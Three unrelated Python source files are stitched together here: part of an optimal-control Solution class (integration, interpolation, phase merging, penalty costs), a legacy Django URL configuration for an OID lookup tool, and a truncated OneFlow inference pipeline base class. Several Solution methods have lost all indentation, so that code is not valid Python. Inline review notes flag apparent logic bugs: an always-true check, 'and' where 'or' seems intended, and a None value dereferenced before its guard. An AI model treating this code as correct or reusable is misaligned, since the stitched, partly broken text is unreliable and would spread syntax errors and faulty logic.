            if sum([len(s) != len(self.ns) if p != 3 else False for p, s in enumerate(_sol)]) != 0:
                # NOTE(review): p != 3 is always True for a 2- or 3-element _sol (indices 0..2);
                # possibly intended as p != 2 to exempt the parameters entry -- confirm
                raise ValueError("The InitialGuessList len must match the number of phases")
            if n_param != 0:
                if len(_sol) != 3 and len(_sol[2]) != 1 and _sol[2][0].shape != (n_param, 1):
                    # NOTE(review): `and`-chained conditions mean this only raises when all
                    # three checks fail at once -- `or` may have been intended; confirm
                    raise ValueError(
                        "The 3rd element is the InitialGuess of the parameter and "
                        "should be a unique vector of size equal to n_param"
                    )

            self.vector = np.ndarray((0, 1))
            sol_states, sol_controls = _sol[0], _sol[1]

            # Dispatch the states into the vector, node by node
            for p, s in enumerate(sol_states):
                # EACH_FRAME guesses already provide one value per node
                ns = self.ocp.nlp[p].ns + 1 if s.init.type != InterpolationType.EACH_FRAME else self.ocp.nlp[p].ns
                s.init.check_and_adjust_dimensions(self.ocp.nlp[p].states.shape, ns, "states")
                for i in range(self.ns[p] + 1):
                    self.vector = np.concatenate((self.vector, s.init.evaluate_at(i)[:, np.newaxis]))

            # Then the controls; the number of columns depends on the control parametrization
            for p, s in enumerate(sol_controls):
                control_type = self.ocp.nlp[p].control_type
                if control_type == ControlType.CONSTANT:
                    off = 0
                elif control_type == ControlType.LINEAR_CONTINUOUS:
                    off = 1  # linear continuous controls also carry a value on the last node
                else:
                    raise NotImplementedError(f"control_type {control_type} is not implemented in Solution")

                s.init.check_and_adjust_dimensions(self.ocp.nlp[p].controls.shape, self.ns[p], "controls")
                for i in range(self.ns[p] + off):
                    self.vector = np.concatenate((self.vector, s.init.evaluate_at(i)[:, np.newaxis]))

            # Finally append the parameters
            if n_param:
                sol_params = _sol[2]
                for p, s in enumerate(sol_params):
                    self.vector = np.concatenate((self.vector, np.repeat(s.init, self.ns[p] + 1)[:, np.newaxis]))

            self._states, self._controls, self.parameters = self.ocp.v.to_dictionaries(self.vector)
            self._complete_control()
            self.phase_time = self.ocp.v.extract_phase_time(self.vector)

        def init_from_vector(_sol: Union[np.ndarray, DM]):
            """
            Initialize all the attributes from a vector of solution

            Parameters
            ----------
            _sol: Union[np.ndarray, DM]
                The solution in vector format
            """

            self.vector = _sol
            self._states, self._controls, self.parameters = self.ocp.v.to_dictionaries(self.vector)
            self._complete_control()
            self.phase_time = self.ocp.v.extract_phase_time(self.vector)

        # Dispatch on the type of the provided solution
        if isinstance(sol, dict):
            init_from_dict(sol)
        elif isinstance(sol, (list, tuple)) and len(sol) in (2, 3):
            init_from_initial_guess(sol)
        elif isinstance(sol, (np.ndarray, DM)):
            init_from_vector(sol)
        elif sol is None:
            self.ns = []  # an empty Solution (e.g. produced by copy(skip_data=True))
        else:
            raise ValueError("Solution called with unknown initializer")
@property
def cost(self):
if self._cost is None:
self._cost = 0
for J in self.ocp.J:
_, val_weighted = self._get_penalty_cost(None, J)
self._cost += val_weighted
for idx_phase, nlp in enumerate(self.ocp.nlp):
for J in nlp.J:
_, val_weighted = self._get_penalty_cost(nlp, J)
self._cost += val_weighted
return self._cost
def copy(self, skip_data: bool = False) -> Any:
"""
Create a deepcopy of the Solution
Parameters
----------
skip_data: bool
If data should be ignored in the copy
Returns
-------
Return a Solution data structure
"""
new = Solution(self.ocp, None)
new.vector = deepcopy(self.vector)
new._cost = deepcopy(self._cost)
new.constraints = deepcopy(self.constraints)
new.lam_g = deepcopy(self.lam_g)
new.lam_p = deepcopy(self.lam_p)
new.lam_x = deepcopy(self.lam_x)
new.inf_pr = deepcopy(self.inf_pr)
new.inf_du = deepcopy(self.inf_du)
new.solver_time_to_optimize = deepcopy(self.solver_time_to_optimize)
new.real_time_to_optimize = deepcopy(self.real_time_to_optimize)
new.iterations = deepcopy(self.iterations)
new.is_interpolated = deepcopy(self.is_interpolated)
new.is_integrated = deepcopy(self.is_integrated)
new.is_merged = deepcopy(self.is_merged)
new.phase_time = deepcopy(self.phase_time)
new.ns = deepcopy(self.ns)
if skip_data:
new._states, new._controls, new.parameters = [], [], {}
else:
new._states = deepcopy(self._states)
new._controls = deepcopy(self._controls)
new.parameters = deepcopy(self.parameters)
return new
@property
def states(self) -> Union[list, dict]:
"""
Returns the state in list if more than one phases, otherwise it returns the only dict
Returns
-------
The states data
"""
return self._states[0] if len(self._states) == 1 else self._states
@property
def controls(self) -> Union[list, dict]:
"""
Returns the controls in list if more than one phases, otherwise it returns the only dict
Returns
-------
The controls data
"""
if not self._controls:
raise RuntimeError(
"There is no controls in the solution. "
"This may happen in "
"previously integrated and interpolated structure"
)
return self._controls[0] if len(self._controls) == 1 else self._controls
    def integrate(
        self,
        shooting_type: Shooting = Shooting.SINGLE_CONTINUOUS,
        keep_intermediate_points: bool = False,
        merge_phases: bool = False,
        continuous: bool = True,
        use_scipy_integrator: bool = False,
    ) -> Any:
        """
        Integrate the states

        Parameters
        ----------
        shooting_type: Shooting
            Which type of integration
        keep_intermediate_points: bool
            If the integration should returns the intermediate values of the integration [False]
            or only keep the node [True] effective keeping the initial size of the states
        merge_phases: bool
            If the phase should be merged in a unique phase
        continuous: bool
            If the arrival value of a node should be discarded [True] or kept [False]. The value of an integrated
            arrival node and the beginning of the next one are expected to be almost equal when the problem converged
        use_scipy_integrator: bool
            Ignore the dynamics defined by OCP and use an separate integrator provided by scipy

        Returns
        -------
        A Solution data structure with the states integrated. The controls are removed from this structure
        """

        # Sanity check: each transformation can only be applied once, and only on raw data
        if self.is_integrated:
            raise RuntimeError("Cannot integrate twice")
        if self.is_interpolated:
            raise RuntimeError("Cannot integrate after interpolating")
        if self.is_merged:
            raise RuntimeError("Cannot integrate after merging phases")

        # Reject meaningless / contradictory option combinations up front
        if shooting_type == Shooting.MULTIPLE and not keep_intermediate_points:
            raise ValueError(
                "Shooting.MULTIPLE and keep_intermediate_points=False cannot be used simultaneously "
                "since it would do nothing"
            )
        if shooting_type == Shooting.SINGLE_CONTINUOUS and not continuous:
            raise ValueError(
                "Shooting.SINGLE_CONTINUOUS and continuous=False cannot be used simultaneously it is a contradiction"
            )

        out = self.__perform_integration(shooting_type, keep_intermediate_points, continuous, use_scipy_integrator)
        if merge_phases:
            if continuous:
                # Continuous data can simply be re-sampled onto a single time grid
                out = out.interpolate(sum(out.ns) + 1)
            else:
                # Otherwise keep the per-node values and concatenate the phases
                out._states, _, out.phase_time, out.ns = out._merge_phases(skip_controls=True, continuous=continuous)
                out.is_merged = True
        out.is_integrated = True
        return out
    def __perform_integration(
        self, shooting_type: Shooting, keep_intermediate_points: bool, continuous: bool, use_scipy_integrator: bool
    ):
        """
        Actually perform the integration of the states (see integrate() for the meaning
        of the parameters) and return a new Solution holding the integrated states
        (the controls are not transferred).
        """

        # The internal integrators cannot re-integrate direct-collocation phases in
        # these modes; scipy must be requested instead
        n_direct_collocation = sum([nlp.ode_solver.is_direct_collocation for nlp in self.ocp.nlp])
        if n_direct_collocation > 0 and not use_scipy_integrator:
            if continuous:
                raise RuntimeError(
                    "Integration with direct collocation must be not continuous if not use_scipy_integrator"
                )

            if shooting_type != Shooting.MULTIPLE:
                raise RuntimeError(
                    "Integration with direct collocation must using shooting_type=Shooting.MULTIPLE "
                    "if not use_scipy_integrator"
                )

        # Copy the data
        out = self.copy(skip_data=True)
        out.recomputed_time_steps = use_scipy_integrator
        out._states = []
        for _ in range(len(self._states)):
            out._states.append({})

        params = self.parameters["all"]
        x0 = self._states[0]["all"][:, 0]
        for p, nlp in enumerate(self.ocp.nlp):
            param_scaling = nlp.parameters.scaling
            n_states = self._states[p]["all"].shape[0]
            n_steps = nlp.ode_solver.steps_scipy if use_scipy_integrator else nlp.ode_solver.steps
            if not continuous:
                n_steps += 1  # the arrival node of each interval is kept as well
            if keep_intermediate_points:
                out.ns[p] *= n_steps  # more frames per shooting interval

            out._states[p]["all"] = np.ndarray((n_states, out.ns[p] + 1))

            # Get the first frame of the phase
            if shooting_type == Shooting.SINGLE_CONTINUOUS:
                if p != 0:
                    # Chain from the previous phase through the phase-transition function
                    u0 = self._controls[p - 1]["all"][:, -1]
                    val = self.ocp.phase_transitions[p - 1].function(vertcat(x0, x0), vertcat(u0, u0), params)
                    if val.shape[0] != x0.shape[0]:
                        raise RuntimeError(
                            f"Phase transition must have the same number of states ({val.shape[0]}) "
                            f"when integrating with Shooting.SINGLE_CONTINUOUS. If it is not possible, "
                            f"please integrate with Shooting.SINGLE"
                        )
                    x0 += np.array(val)[:, 0]
            else:
                # Restart each phase from the optimized states
                col = slice(0, n_steps) if nlp.ode_solver.is_direct_collocation and not use_scipy_integrator else 0
                x0 = self._states[p]["all"][:, col]

            for s in range(self.ns[p]):
                # The controls of this interval depend on the control parametrization
                if nlp.control_type == ControlType.CONSTANT:
                    u = self._controls[p]["all"][:, s]
                elif nlp.control_type == ControlType.LINEAR_CONTINUOUS:
                    u = self._controls[p]["all"][:, s : s + 2]
                else:
                    raise NotImplementedError(f"ControlType {nlp.control_type} " f"not yet implemented in integrating")

                if use_scipy_integrator:
                    # Integrate this interval with scipy's solve_ivp, ignoring the OCP dynamics integrator
                    t_init = sum(out.phase_time[:p]) / nlp.ns
                    t_end = sum(out.phase_time[: (p + 2)]) / nlp.ns
                    n_points = n_steps + 1 if continuous else n_steps
                    t_eval = np.linspace(t_init, t_end, n_points) if keep_intermediate_points else [t_init, t_end]
                    integrated = solve_ivp(
                        lambda t, x: np.array(nlp.dynamics_func(x, u, params))[:, 0], [t_init, t_end], x0, t_eval=t_eval
                    ).y

                    next_state_col = (
                        (s + 1) * (nlp.ode_solver.steps + 1) if nlp.ode_solver.is_direct_collocation else s + 1
                    )
                    cols_in_out = [s * n_steps, (s + 1) * n_steps] if keep_intermediate_points else [s, s + 2]

                else:
                    if nlp.ode_solver.is_direct_collocation:
                        # The collocation solution already holds the interior points; reuse them
                        if keep_intermediate_points:
                            integrated = x0  # That is only for continuous=False
                            cols_in_out = [s * n_steps, (s + 1) * n_steps]
                        else:
                            integrated = x0[:, [0, -1]]
                            cols_in_out = [s, s + 2]
                        next_state_col = slice((s + 1) * n_steps, (s + 2) * n_steps)

                    else:
                        # Use the problem's own dynamics integrator for this interval
                        if keep_intermediate_points:
                            integrated = np.array(nlp.dynamics[s](x0=x0, p=u, params=params / param_scaling)["xall"])
                            cols_in_out = [s * n_steps, (s + 1) * n_steps]
                        else:
                            integrated = np.concatenate(
                                (x0[:, np.newaxis], nlp.dynamics[s](x0=x0, p=u, params=params / param_scaling)["xf"]),
                                axis=1,
                            )
                            cols_in_out = [s, s + 2]
                        next_state_col = s + 1

                cols_in_out = slice(
                    cols_in_out[0], cols_in_out[1] + 1 if continuous and keep_intermediate_points else cols_in_out[1]
                )
                out._states[p]["all"][:, cols_in_out] = integrated
                # Next starting point: the optimized node for multiple shooting,
                # otherwise the integrated arrival value
                x0 = (
                    np.array(self._states[p]["all"][:, next_state_col])
                    if shooting_type == Shooting.MULTIPLE
                    else integrated[:, -1]
                )

            if not continuous:
                # Overwrite the very last frame with the optimized one
                out._states[p]["all"][:, -1] = self._states[p]["all"][:, -1]

            # Dispatch the integrated values to all the keys
            for key in nlp.states:
                out._states[p][key] = out._states[p]["all"][nlp.states[key].index, :]

        return out
    def interpolate(self, n_frames: Union[int, list, tuple]) -> Any:
        """
        Interpolate the states

        Parameters
        ----------
        n_frames: Union[int, list, tuple]
            If the value is an int, the Solution returns merges the phases,
            otherwise, it interpolates them independently

        Returns
        -------
        A Solution data structure with the states integrated. The controls are removed from this structure
        """

        out = self.copy(skip_data=True)

        # Build the time vector of each phase
        t_all = []
        for p, data in enumerate(self._states):
            nlp = self.ocp.nlp[p]
            if nlp.ode_solver.is_direct_collocation and not self.recomputed_time_steps:
                # Collocation nodes are not equally spaced: reconstruct the exact time grid
                time_offset = sum(out.phase_time[: p + 1])
                step_time = np.array(nlp.dynamics[0].step_time)
                dt = out.phase_time[p + 1] / nlp.ns
                t_tp = np.array([step_time * dt + s * dt + time_offset for s in range(nlp.ns)]).reshape(-1, 1)
                # Duplicate the final time so the grid matches the extra arrival node
                t_all.append(np.concatenate((t_tp, [[t_tp[-1, 0]]]))[:, 0])
            else:
                t_all.append(np.linspace(sum(out.phase_time[: p + 1]), sum(out.phase_time[: p + 2]), out.ns[p] + 1))

        if isinstance(n_frames, int):
            # A single int means: merge all the phases, then interpolate on one grid
            data_states, _, out.phase_time, out.ns = self._merge_phases(skip_controls=True)
            t_all = [np.concatenate((np.concatenate([_t[:-1] for _t in t_all]), [t_all[-1][-1]]))]
            n_frames = [n_frames]
            out.is_merged = True
        elif isinstance(n_frames, (list, tuple)) and len(n_frames) == len(self._states):
            data_states = self._states
        else:
            raise ValueError(
                "n_frames should either be a int to merge_phases phases "
                "or a list of int of the number of phases dimension"
            )

        out._states = []
        for _ in range(len(data_states)):
            out._states.append({})
        for p in range(len(data_states)):
            x_phase = data_states[p]["all"]
            n_elements = x_phase.shape[0]

            t_phase = t_all[p]
            # Duplicated time points (phase junctions) would break the spline fit
            t_phase, time_index = np.unique(t_phase, return_index=True)
            t_int = np.linspace(t_phase[0], t_phase[-1], n_frames[p])

            x_interpolate = np.ndarray((n_elements, n_frames[p]))
            for j in range(n_elements):
                # Linear (k=1) spline through the unique samples of each state row
                s = sci_interp.splrep(t_phase, x_phase[j, time_index], k=1)
                x_interpolate[j, :] = sci_interp.splev(t_int, s)
            out._states[p]["all"] = x_interpolate

            # Dispatch the interpolated rows back to the named state entries
            offset = 0
            for key in data_states[p]:
                if key == "all":
                    continue
                n_elements = data_states[p][key].shape[0]
                out._states[p][key] = out._states[p]["all"][offset : offset + n_elements]
                offset += n_elements

        out.is_interpolated = True
        return out
def merge_phases(self) -> Any:
"""
Get a data structure where all the phases are merged into one
Returns
-------
The new data structure with the phases merged
"""
new = self.copy(skip_data=True)
new.parameters = deepcopy(self.parameters)
new._states, new._controls, new.phase_time, new.ns = self._merge_phases()
new.is_merged = True
return new
    def _merge_phases(self, skip_states: bool = False, skip_controls: bool = False, continuous: bool = True) -> tuple:
        """
        Actually performing the phase merging

        Parameters
        ----------
        skip_states: bool
            If the merge should ignore the states
        skip_controls: bool
            If the merge should ignore the controls
        continuous: bool
            If the last frame of each phase should be kept [False] or discard [True]

        Returns
        -------
        A tuple containing the new states, new controls, the recalculated phase time
        and the new number of shooting points
        """

        if self.is_merged:
            # Already merged: just hand back deep copies of the current data
            return deepcopy(self._states), deepcopy(self._controls), deepcopy(self.phase_time), deepcopy(self.ns)

        def _merge(data: list, is_control: bool) -> Union[list, dict]:
            """
            Merge the phases of a states or controls data structure

            Parameters
            ----------
            data: list
                The data to structure to merge the phases
            is_control: bool
                If the current data is a control

            Returns
            -------
            The data merged
            """

            if isinstance(data, dict):
                return data  # single phase: nothing to merge

            # Sanity check (all phases must contain the same keys with the same dimensions)
            keys = data[0].keys()
            sizes = [data[0][d].shape[0] for d in data[0]]
            for d in data:
                if d.keys() != keys or [d[key].shape[0] for key in d] != sizes:
                    raise RuntimeError("Program dimension must be coherent across phases to merge_phases them")

            data_out = [{}]
            for i, key in enumerate(keys):
                data_out[0][key] = np.ndarray((sizes[i], 0))

            # add == 1 keeps each phase's arrival node; add == 0 drops it (continuous data)
            add = 0 if is_control or continuous else 1
            for p in range(len(data)):
                d = data[p]
                for key in d:
                    if self.ocp.nlp[p].ode_solver.is_direct_collocation and not is_control:
                        # Collocation states carry (steps + 1) columns per shooting interval
                        steps = self.ocp.nlp[p].ode_solver.steps + 1
                        data_out[0][key] = np.concatenate(
                            (data_out[0][key], d[key][:, : self.ns[p] * steps + add]), axis=1
                        )
                    else:
                        data_out[0][key] = np.concatenate((data_out[0][key], d[key][:, : self.ns[p] + add]), axis=1)
            if add == 0:
                # The very last frame of the last phase is always kept
                for key in data[-1]:
                    data_out[0][key] = np.concatenate((data_out[0][key], data[-1][key][:, -1][:, np.newaxis]), axis=1)

            return data_out

        if len(self._states) == 1:
            out_states = deepcopy(self._states)
        else:
            out_states = _merge(self.states, is_control=False) if not skip_states and self._states else None

        if len(self._controls) == 1:
            out_controls = deepcopy(self._controls)
        else:
            out_controls = _merge(self.controls, is_control=True) if not skip_controls and self._controls else None
        # Merged total duration (single phase) and total number of shooting nodes
        phase_time = [0] + [sum([self.phase_time[i + 1] for i in range(len(self.phase_time) - 1)])]
        ns = [sum(self.ns)]

        return out_states, out_controls, phase_time, ns
def _complete_control(self):
"""
Controls don't necessarily have dimensions that matches the states. This method aligns them
"""
for p, nlp in enumerate(self.ocp.nlp):
if nlp.control_type == ControlType.CONSTANT:
for key in self._controls[p]:
self._controls[p][key] = np.concatenate(
(self._controls[p][key], np.nan * np.zeros((self._controls[p][key].shape[0], 1))), axis=1
)
elif nlp.control_type == ControlType.LINEAR_CONTINUOUS:
pass
else:
raise NotImplementedError(f"ControlType {nlp.control_type} is not implemented in _complete_control")
def graphs(
self,
automatically_organize: bool = True,
show_bounds: bool = False,
show_now: bool = True,
shooting_type: Shooting = Shooting.MULTIPLE,
use_scipy_integrator: bool = False,
):
"""
Show the graphs of the simulation
Parameters
----------
automatically_organize: bool
If the figures should be spread on the screen automatically
show_bounds: bool
If the plot should adapt to bounds (True) or to data (False)
show_now: bool
If the show method should be called. This is blocking
shooting_type: Shooting
The type of interpolation
use_scipy_integrator: bool
Use the scipy solve_ivp integrator for RungeKutta 45 instead of currently defined integrator
"""
if self.is_merged or self.is_interpolated or self.is_integrated:
raise NotImplementedError("It is not possible to graph a modified Solution yet")
plot_ocp = self.ocp.prepare_plots(automatically_organize, show_bounds, shooting_type, use_scipy_integrator)
plot_ocp.update_data(self.vector)
if show_now:
plt.show()
    def animate(
        self, n_frames: int = 0, shooting_type: Shooting = None, show_now: bool = True, **kwargs: Any
    ) -> Union[None, list]:
        """
        Animate the simulation

        Parameters
        ----------
        n_frames: int
            The number of frames to interpolate to. If the value is 0, the data are merged to a one phase if possible.
            If the value is -1, the data is not merge in one phase
        shooting_type: Shooting
            The Shooting type to animate
        show_now: bool
            If the bioviz exec() function should be called automatically. This is blocking method
        kwargs: Any
            Any parameters to pass to bioviz

        Returns
        -------
        A list of bioviz structures (one for each phase). So one can call exec() by hand
        """

        # bioviz is an optional dependency, imported lazily
        try:
            import bioviz
        except ModuleNotFoundError:
            raise RuntimeError("bioviz must be install to animate the model")
        check_version(bioviz, "2.1.1", "2.2.0")

        data_to_animate = self.integrate(shooting_type=shooting_type) if shooting_type else self.copy()
        if n_frames == 0:
            try:
                # Try to merge all phases into a single animation
                data_to_animate = data_to_animate.interpolate(sum(self.ns))
            except RuntimeError:
                pass
        elif n_frames > 0:
            data_to_animate = data_to_animate.interpolate(n_frames)

        states = data_to_animate.states
        if not isinstance(states, (list, tuple)):
            states = [states]

        all_bioviz = []
        for idx_phase, data in enumerate(states):
            # Convert parameters to actual values
            nlp = self.ocp.nlp[idx_phase]
            for param in nlp.parameters:
                if param.function:
                    param.function(nlp.model, self.parameters[param.name], **param.params)

            all_bioviz.append(bioviz.Viz(self.ocp.nlp[idx_phase].model.path().absolutePath().to_string(), **kwargs))
            # Animate the generalized coordinates, mapped back to the full model
            all_bioviz[-1].load_movement(self.ocp.nlp[idx_phase].variable_mappings["q"].to_second.map(data["q"]))

        if show_now:
            # Keep refreshing every window until the user closes them all (blocking)
            b_is_visible = [True] * len(all_bioviz)
            while sum(b_is_visible):
                for i, b in enumerate(all_bioviz):
                    if b.vtk_window.is_active:
                        b.update()
                    else:
                        b_is_visible[i] = False
            return None
        else:
            return all_bioviz
    def _get_penalty_cost(self, nlp, penalty):
        """
        Evaluate one penalty (objective or constraint) over all of its nodes.

        Parameters
        ----------
        nlp
            The phase the penalty belongs to, or None for phase-independent penalties.
            NOTE(review): phase_idx and steps are read from nlp *before* the
            `if nlp is not None` guard below, so passing None actually raises here -- confirm.
        penalty
            The penalty to evaluate (provides function, weighted_function, node_idx, ...)

        Returns
        -------
        The unweighted and the weighted sums of the penalty over its nodes
        """

        phase_idx = nlp.phase_idx
        # Collocation states carry (steps + 1) columns per shooting interval
        steps = nlp.ode_solver.steps + 1 if nlp.ode_solver.is_direct_collocation else 1

        val = []
        val_weighted = []
        p = self.parameters["all"]
        # dt may be an expression of the optimized time parameter
        dt = (
            Function("time", [nlp.parameters.cx], [penalty.dt])(self.parameters["time"])
            if "time" in self.parameters
            else penalty.dt
        )

        for idx in penalty.node_idx:
            x = []
            u = []
            target = []
            if nlp is not None:
                if penalty.transition:
                    # A transition is evaluated on the last node of this phase and the
                    # first node of the next one (cyclic on the last phase)
                    phase_post = (phase_idx + 1) % len(self._states)
                    x = np.concatenate((self._states[phase_idx]["all"][:, -1], self._states[phase_post]["all"][:, 0]))
                    u = np.concatenate(
                        (self._controls[phase_idx]["all"][:, -1], self._controls[phase_post]["all"][:, 0])
                    )
                else:
                    # Integral penalties use all the columns of the interval, others only the node
                    col_x_idx = list(range(idx * steps, (idx + 1) * steps)) if penalty.integrate else [idx]
                    col_u_idx = [idx]
                    if penalty.derivative or penalty.explicit_derivative:
                        # Derivative-type penalties also need the following node
                        col_x_idx.append((idx + 1) * steps)
                        col_u_idx.append((idx + 1))

                    x = self._states[phase_idx]["all"][:, col_x_idx]
                    u = self._controls[phase_idx]["all"][:, col_u_idx]
                    target = penalty.target[:, penalty.node_idx.index(idx)] if penalty.target is not None else []

            val.append(penalty.function(x, u, p))
            val_weighted.append(penalty.weighted_function(x, u, p, penalty.weight, target, dt))

        # nansum ignores the NaN padding column added by _complete_control
        val = np.nansum(val)
        val_weighted = np.nansum(val_weighted)

        return val, val_weighted
    def print(self, cost_type: CostType = CostType.ALL):
        """
        Print the objective functions and/or constraints to the console

        Parameters
        ----------
        cost_type: CostType
            The type of cost to console print
        """

        def print_penalty_list(nlp, penalties, print_only_weighted):
            # Print each penalty of the list and return the sum of the weighted values
            running_total = 0
            for penalty in penalties:
                if not penalty:
                    continue

                val, val_weighted = self._get_penalty_cost(nlp, penalty)
                running_total += val_weighted
                if print_only_weighted:
                    print(f"{penalty.name}: {val_weighted}")
                else:
                    print(f"{penalty.name}: {val: .2f} (weighted {val_weighted})")

            return running_total

        def print_objective_functions(ocp):
            """
            Print the values of each objective function to the console
            """
            print(f"\n---- COST FUNCTION VALUES ----")
            # Phase-independent objectives first
            running_total = print_penalty_list(None, ocp.J_internal, False)
            running_total += print_penalty_list(None, ocp.J, False)
            if running_total:
                print("")

            # Then the per-phase objectives
            for nlp in ocp.nlp:
                print(f"PHASE {nlp.phase_idx}")
                running_total += print_penalty_list(nlp, nlp.J_internal, False)
                running_total += print_penalty_list(nlp, nlp.J, False)
                print("")

            print(f"Sum cost functions: {running_total}")
            print(f"------------------------------")

        def print_constraints(ocp, sol):
            """
            Print the values of each constraints with its lagrange multiplier to the console
            """
            # Nothing to print when the solution carries no constraint values
            if sol.constraints is None:
                return

            # Todo, min/mean/max
            print(f"\n--------- CONSTRAINTS ---------")
            if print_penalty_list(None, ocp.g_internal, True) + print_penalty_list(None, ocp.g, True):
                print("")

            for idx_phase, nlp in enumerate(ocp.nlp):
                print(f"PHASE {idx_phase}")
                print_penalty_list(nlp, nlp.g_internal, True)
                print_penalty_list(nlp, nlp.g, True)
                print("")

            print(f"------------------------------")

        if cost_type == CostType.OBJECTIVES:
            print_objective_functions(self.ocp)
        elif cost_type == CostType.CONSTRAINTS:
            print_constraints(self.ocp, self)
        elif cost_type == CostType.ALL:
            print(
                f"Solver reported time: {self.solver_time_to_optimize} sec\n"
                f"Real time: {self.real_time_to_optimize} sec"
            )
            # Recurse once for each section
            self.print(CostType.OBJECTIVES)
            self.print(CostType.CONSTRAINTS)
        else:
            raise ValueError("print can only be called with CostType.OBJECTIVES or CostType.CONSTRAINTS")
|
python
|
from django.conf.urls.defaults import *
from django.views.generic.simple import redirect_to
import views
# NOTE(review): django.conf.urls.defaults, patterns() and redirect_to target a
# legacy Django version (removed in 1.4/1.5) -- confirm before any framework upgrade
urlpatterns = patterns('',
    # Home page
    (r'^$', views.home),
    # would like to avoid hardcoding mibbinator here
    # Bare OIDs (optionally prefixed with "o/." or ".") redirect to the canonical /o/ URL
    (r'^(o/\.|\.?)(?P<oid>[0-9.]*)$', redirect_to, { 'url': '/mibbinator/o/%(oid)s' }),
    # Lookup by numeric OID, e.g. /o/1.3.6.1
    (r'^o/(?P<oid>[0-9.]+)$', views.byoid),
    # Lookup by MIB module name
    (r'^m/(?P<module>[\w-]+)$', views.bymodule),
    # Fallback: lookup by object name
    (r'^(?P<name>\w+)$', views.byname),
)
|
python
|
# coding=utf-8
# Copyright 2021 The OneFlow Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from abc import ABCMeta, abstractmethod
from typing import Any, Dict
import oneflow as flow
from libai.config import LazyConfig, try_get_key
from libai.engine import DefaultTrainer
from libai.utils import distributed as dist
from libai.utils.checkpoint import Checkpointer
from libai.utils.logger import setup_logger
# setup_logger() configures the logging handlers as a side effect; its return
# value was previously bound to `logger` and immediately overwritten (dead store),
# so the call result is now deliberately discarded in favor of a named child logger.
setup_logger(distributed_rank=dist.get_rank())
logger = logging.getLogger("libai.inference")
class BasePipeline(metaclass=ABCMeta):
    """
    Base class for all task pipelines.

    Loads a LazyConfig, builds the model and tokenizer through ``DefaultTrainer``,
    then ``__call__`` chains preprocess -> forward -> postprocess under
    ``flow.no_grad()``. Subclasses implement ``_parse_parameters``, ``preprocess``,
    ``forward`` and ``postprocess``.
    """

    def __init__(
        self,
        config_file,
        data_parallel=None,
        tensor_parallel=None,
        pipeline_parallel=None,
        **kwargs,
    ):
        """
        Parameters
        ----------
        config_file:
            Path of the LazyConfig describing the task.
        data_parallel, tensor_parallel, pipeline_parallel:
            Parallelism sizes. ``None`` (the default) keeps the value already
            present in the loaded config.
        kwargs:
            Extra parameters, split by ``_parse_parameters`` into the
            preprocess / forward / postprocess parameter dicts.
        """
        # init cfg
        self.cfg = LazyConfig.load(config_file)
        flow.boxing.nccl.set_fusion_threshold_mbytes(
            try_get_key(self.cfg, "train.nccl_fusion_threshold_mb", default=16)
        )
        flow.boxing.nccl.set_fusion_max_ops_num(
            try_get_key(self.cfg, "train.nccl_fusion_max_ops", default=24)
        )
        self.update_cfg(data_parallel, tensor_parallel, pipeline_parallel)
        dist.setup_dist_util(self.cfg.train.dist)
        assert (
            self.cfg.train.dist.data_parallel_size == 1
        ), "not support data parallel yet, only support tensor and pipeline parallel"
        logger.info(self.cfg.train.dist)

        # initial and load model
        self.model = DefaultTrainer.build_model(self.cfg).eval()
        self.load_pretrain_weight(self.model, self.cfg)

        # initial tokenizer
        self.tokenizer = self.build_tokenizer(self.cfg)

        # set parameters
        (
            self._preprocess_params,
            self._forward_params,
            self._postprocess_params,
        ) = self._parse_parameters(**kwargs)

    def update_cfg(
        self,
        data_parallel=1,
        tensor_parallel=1,
        pipeline_parallel=1,
    ):
        """Write the requested parallel sizes into the config.

        Bug fix: ``__init__`` forwards ``None`` for any size the caller did not
        specify; previously those ``None`` values were written into the config,
        clobbering the sizes defined in the config file. ``None`` now means
        "keep the configured value".
        """
        if data_parallel is not None:
            self.cfg.train.dist.data_parallel_size = data_parallel
        if tensor_parallel is not None:
            self.cfg.train.dist.tensor_parallel_size = tensor_parallel
        if pipeline_parallel is not None:
            self.cfg.train.dist.pipeline_parallel_size = pipeline_parallel

        if self.cfg.train.dist.pipeline_parallel_size > 1:
            # Pipeline parallelism needs the per-stage layer split to be declared
            assert (
                try_get_key(self.cfg.train.dist, "pipeline_num_layers") is not None
            ), "cfg.train.dist.pipeline_num_layers must be set when run pipeline parallel"

    def load_pretrain_weight(self, model, cfg):
        """Load (without resuming) the pretrained weights from ``cfg.train.load_weight``."""
        Checkpointer(model, save_dir=cfg.train.output_dir).resume_or_load(
            cfg.train.load_weight, resume=False
        )

    def build_tokenizer(self, cfg):
        """Build the tokenizer when the config declares a ``tokenization`` section, else None."""
        tokenizer = None
        if try_get_key(cfg, "tokenization") is not None:
            tokenizer = DefaultTrainer.build_tokenizer(cfg)
        return tokenizer

    @abstractmethod
    def _parse_parameters(self, **pipeline_parameters):
        """Split keyword arguments into (preprocess, forward, postprocess) parameter dicts."""
        raise NotImplementedError("_parse_parameters not implemented")

    def __call__(self, inputs, *args, batch_size=None, **kwargs) -> dict:
        """Run the full pipeline on ``inputs``; returns the postprocessed dict
        on the main process and an empty dict on other ranks."""
        preprocess_params, forward_params, postprocess_params = self._parse_parameters(
            **kwargs
        )  # noqa

        # Fuse __init__ params and __call__ params without modifying the __init__ ones.
        preprocess_params = {**self._preprocess_params, **preprocess_params}
        forward_params = {**self._forward_params, **forward_params}
        postprocess_params = {**self._postprocess_params, **postprocess_params}

        with flow.no_grad():
            model_inputs_dict = self.preprocess(inputs, **preprocess_params)
            model_outputs_dict = self.forward(model_inputs_dict, **forward_params)
            model_outputs_dict = self.to_local(model_outputs_dict)
            if dist.is_main_process():
                outputs_dict = self.postprocess(model_outputs_dict, **postprocess_params)
            else:
                outputs_dict = {}
            # Make sure every rank has finished before returning
            dist.synchronize()
            return outputs_dict

    def to_local(self, model_outputs_dict):
        """Convert global tensors in the output dict to local tensors on rank 0, in place."""
        for key, value in model_outputs_dict.items():
            if isinstance(value, flow.Tensor) and value.is_global:
                model_outputs_dict[key] = dist.ttol(
                    value, ranks=[0] if value.placement.ranks.ndim == 1 else [[0]]
                )
        if flow.cuda.is_available():
            dist.synchronize()
        return model_outputs_dict

    @abstractmethod
